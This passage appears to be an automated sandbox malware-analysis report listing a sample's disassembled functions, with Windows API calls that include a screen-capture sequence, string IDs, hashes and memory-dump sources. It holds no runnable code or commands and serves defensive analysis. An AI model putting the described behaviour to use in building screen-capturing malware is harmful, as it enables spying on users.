                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8fd00541a03fdab39137d35ec259fb7aeeef9dd7c60101cc427a738eb574f5a5
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 25415C7050C3818ED311EF78948835FBFE5AB92318F05096DE4D987296D7B9C548CBAB
                                                                                                                                                                                                                                        Function 021255CF Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 106COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: DrivesLogical
                                                                                                                                                                                                                                        • String ID: %\)R$,X*^$.T'j$1D6Z$:@&F$?P:V$C`<f
                                                                                                                                                                                                                                        • API String ID: 999431828-351939610
                                                                                                                                                                                                                                        • Opcode ID: 4f62df2b81f42cfb46ec157f180c00cd4febe93a651d1f2f065370f133753792
                                                                                                                                                                                                                                        • Instruction ID: 98815a668fff7cd6cd6910722281def0a154962e2b2d34272f4a8a4bcd47f89b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4f62df2b81f42cfb46ec157f180c00cd4febe93a651d1f2f065370f133753792
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B631FCB41493548FC314CF15C89122BBBB2FFC1324F40981CF6964B720E779994ACB42
                                                                                                                                                                                                                                        Function 02136BE7 Relevance: 12.1, APIs: 8, Instructions: 67windowCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetDC.USER32(00000000), ref: 02136BF0
                                                                                                                                                                                                                                        • GetCurrentObject.GDI32(00000000,00000007), ref: 02136C11
                                                                                                                                                                                                                                        • GetObjectW.GDI32(00000000,00000018,?), ref: 02136C21
                                                                                                                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 02136C28
                                                                                                                                                                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 02136C37
                                                                                                                                                                                                                                        • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 02136C42
                                                                                                                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 02136C4E
                                                                                                                                                                                                                                        • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,00CC0020), ref: 02136C71
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Object$CompatibleCreate$BitmapCurrentDeleteSelect
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2843486406-0
                                                                                                                                                                                                                                        • Opcode ID: 637d2dcd770b1b81d6daddeec98349090a5cabd35a80d80db673790c1e385553
                                                                                                                                                                                                                                        • Instruction ID: 88dc72446b61d773bae4b1778e9fe447bce96a13afddce8d0a62a169f9209d73
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 637d2dcd770b1b81d6daddeec98349090a5cabd35a80d80db673790c1e385553
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F6214FB9544310EFE3509F609C49B2B7BF9EB8AB11F014929FA59A2290D77498048B67
                                                                                                                                                                                                                                        Function 02125367 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 85COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000), ref: 02125411
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                        • String ID: +$e$+$e$XY$E#G
                                                                                                                                                                                                                                        • API String ID: 237503144-1023387988
                                                                                                                                                                                                                                        • Opcode ID: 796cc6ccac140472a8104463ef7e640a249bdffaa71f860e68154a69d4d8fa0c
                                                                                                                                                                                                                                        • Instruction ID: 889aa99dfa24cbfc1346f60c0a782832a5c5f50b7e18343fc2dcb72d1edded62
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 796cc6ccac140472a8104463ef7e640a249bdffaa71f860e68154a69d4d8fa0c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AC21363024C344AFE3148F65E88171FBBE0EBC6714F24C82CE5A85B282D775C80A8F86
                                                                                                                                                                                                                                        Function 02125A47 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 117COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 02125B5B
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                        • String ID: B"@$`J/H$rp
                                                                                                                                                                                                                                        • API String ID: 237503144-3817236508
                                                                                                                                                                                                                                        • Opcode ID: d1879db7092e8caf361d2fa4e2e19fcb9f3d80e285b1dd23349b8ef0ea2aa233
                                                                                                                                                                                                                                        • Instruction ID: e554684047942922bbb0540b9233d797576653ad7eae3a1ed7d03634a553576d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d1879db7092e8caf361d2fa4e2e19fcb9f3d80e285b1dd23349b8ef0ea2aa233
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BC31CDB0E443589FDB14CFA9D8827DEBBB2EF45700F50002CE441BB295D6B55906CFA9
                                                                                                                                                                                                                                        Function 0042F0FD Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 160COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: FreeLibrary
                                                                                                                                                                                                                                        • String ID: aN@$Mw
                                                                                                                                                                                                                                        • API String ID: 3664257935-3418203734
                                                                                                                                                                                                                                        • Opcode ID: 28d46f0181f3b50e948c632c08c35fa26ca83e1b98030933ba528579462b072f
                                                                                                                                                                                                                                        • Instruction ID: fb7b49653fcfe6187a11668ca7033b53e8d7d933bb39412ee55706a61e0bd157
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 28d46f0181f3b50e948c632c08c35fa26ca83e1b98030933ba528579462b072f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5951777460C3C08BE3358B299C557ABBFE29FE2308F48096DE0D95B3D2DA74440AC75A
                                                                                                                                                                                                                                        Function 0040BA80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: FreeLibrary
                                                                                                                                                                                                                                        • String ID: Mw
                                                                                                                                                                                                                                        • API String ID: 3664257935-2910736759
                                                                                                                                                                                                                                        • Opcode ID: 880272bc0811b14ab5181b2bf88990afbeca93da92f698920aa63cdcc06e2724
                                                                                                                                                                                                                                        • Instruction ID: 76f8199259777ce60f51c6d99c718f1815bb22ab62b72bec75753df54c08d8dc
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 880272bc0811b14ab5181b2bf88990afbeca93da92f698920aa63cdcc06e2724
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E2C0023B8620009BDE857FA0FD898187A31FB4A30531C44B4B80140036DAA20960AA59